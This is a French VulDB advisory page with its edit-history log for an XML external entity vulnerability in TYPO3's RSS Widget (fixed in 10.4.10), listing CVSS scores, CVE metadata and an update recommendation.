TYPO3 à 10.4.9 RSS Widget XML External Entity

entréeeditHistoryDiffjsonxmlCTI

Une vulnérabilité qui a été classée critique a été trouvée dans TYPO3 à 10.4.9 (Content Management System). Affecté par cette vulnérabilité est une fonction inconnue du composant RSS Widget. Mettre à jour à la version 10.4.10 élimine cette vulnérabilité.

Chronologie

Utilisateur

Domaine

Commit Conf

Approve Conf

IDEngagéUtilisateurDomaineChangementRemarquesModéréRaisonC
1071649410/12/2020VulD...cvss2_nvd_basescore3.6nist.gov10/12/2020accepté90
1071649310/12/2020VulD...cve_cnaGitHub, Inc.nvd.nist.gov10/12/2020accepté70
1071649210/12/2020VulD...cvss2_nvd_aiPnvd.nist.gov10/12/2020accepté70
1071649110/12/2020VulD...cvss2_nvd_iiNnvd.nist.gov10/12/2020accepté70
1071649010/12/2020VulD...cvss2_nvd_ciPnvd.nist.gov10/12/2020accepté70
1071648910/12/2020VulD...cvss2_nvd_auSnvd.nist.gov10/12/2020accepté70
1071648810/12/2020VulD...cvss2_nvd_acHnvd.nist.gov10/12/2020accepté70
1071648710/12/2020VulD...cvss2_nvd_avNnvd.nist.gov10/12/2020accepté70
1071648610/12/2020VulD...cve_nvd_summaryTYPO3 is an open source PHP based web content management system. In TYPO3 from version 10.4.0, and before version 10.4.10, RSS widgets are susceptible to XML external entity processing. This vulnerability is reasonable, but is theoretical - it was not possible to actually reproduce the vulnerability with current PHP versions of supported and maintained system distributions. At least with libxml2 version 2.9, the processing of XML external entities is disabled per default - and cannot be exploited. Besides that, a valid backend user account is needed. Update to TYPO3 version 10.4.10 to fix the problem described.cve.mitre.org10/12/2020accepté70
1071648510/12/2020VulD...cve_assigned1601503200cve.mitre.org10/12/2020accepté70
1065404424/11/2020VulD...price_0day$5k-$25ksee documentation24/11/2020accepté90
1065404324/11/2020VulD...cvss3_meta_tempscore5.3see documentation24/11/2020accepté90
1065404224/11/2020VulD...cvss3_meta_basescore5.5see documentation24/11/2020accepté90
1065404124/11/2020VulD...cvss3_vuldb_tempscore5.324/11/2020accepté90
1065404024/11/2020VulD...cvss3_vuldb_basescore5.524/11/2020accepté90
1065403924/11/2020VulD...cvss2_vuldb_tempscore5.724/11/2020accepté90
1065403824/11/2020VulD...cvss2_vuldb_basescore6.524/11/2020accepté90
1065403724/11/2020VulD...cvss3_vuldb_eXderived from historical data24/11/2020accepté80
1065403624/11/2020VulD...cvss2_vuldb_eNDderived from historical data24/11/2020accepté80
1065403524/11/2020VulD...cvss2_vuldb_auSderived from historical data24/11/2020accepté80

Want to stay up to date on a daily basis?

Enable the mail alert feature now!